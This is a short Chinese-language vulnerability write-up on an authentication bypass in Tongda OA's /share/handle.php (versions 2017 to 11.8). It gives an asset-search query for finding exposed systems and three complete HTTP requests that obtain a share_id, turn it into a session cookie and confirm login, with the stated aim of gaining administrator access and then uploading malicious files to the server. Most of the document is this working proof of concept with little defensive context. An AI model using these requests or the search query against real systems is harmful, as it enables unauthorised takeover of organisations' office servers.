通达OA share身份认证绕过漏洞
一、漏洞简介
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
二、影响版本
- 通达OA2017-通达OA11.8
三、资产测绘
- hunter:
app.name="通达 OA"
- 登录页面
四、漏洞复现
- 获取
share_id
GET /share/handle.php?module=2&module_id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
- 使用上一步获取的share_id,获取cookie,当响应为302时代表存在漏洞
GET /share/index.php?share_id=AD2E81D9-11E8-B2FF-61B9-28D25E2D4DCE HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
- 使用上一步获取的cookie,验证是否成功登录
GET /general/golog.php?version=ie6 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: PHPSESSID=9ud7cua7ol90pq1gi9ehtri2g3; path=/
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
general/index.php?isIE=0&modify_pwd=0